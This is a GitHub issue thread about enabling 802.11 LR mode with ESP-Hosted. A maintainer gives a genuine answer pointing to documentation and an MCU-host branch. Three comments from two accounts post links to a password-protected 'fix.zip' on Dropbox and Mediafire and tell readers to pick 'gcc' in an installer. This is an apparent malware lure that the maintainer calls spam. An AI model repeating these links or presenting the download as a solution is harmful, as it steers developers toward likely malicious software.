espressif/esp-hosted #465: 802.11LR mode?

kaidegit, 2024-08-26:
Does the `esp-hosted-fg` turn on 802.11LR mode? If not, how could I enable it?

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

mantriyogesh, 2024-08-26:
@Dev-Victor-Rodrigues please do not spam.

mantriyogesh, 2024-08-26:
@kaidegit , I hope you have gone through LR documentation at https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/wifi.html#long-range-lr

While we never have tested this with ESP-Hosted yet, it should be fairly simple to support this with small changes.

Can you please confirm the host is Linux or MCU?

kaidegit, 2024-08-26:
MCU.

I think it has no api to control it by MCU, so I should add some into source code?

mantriyogesh, 2024-08-26:
If MCU, you can refer https://github.com/espressif/esp-hosted/tree/feature/esp_as_mcu_host

The wifi APIs used are seamless and transparent RPC call, meaning you have full control of wifi APIs.

This branch showcase ESP chipset as host (as example) and another ESP chipset as slave.
You can set the LR etc in dual chipset mode (host based model) just similar as you would do on normal native ESP chipset (single chip).

Once you have single chip LR working on ESP chipset, you can expect same example to work on hosted mode.

closed 2024-08-26 by kaidegit

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."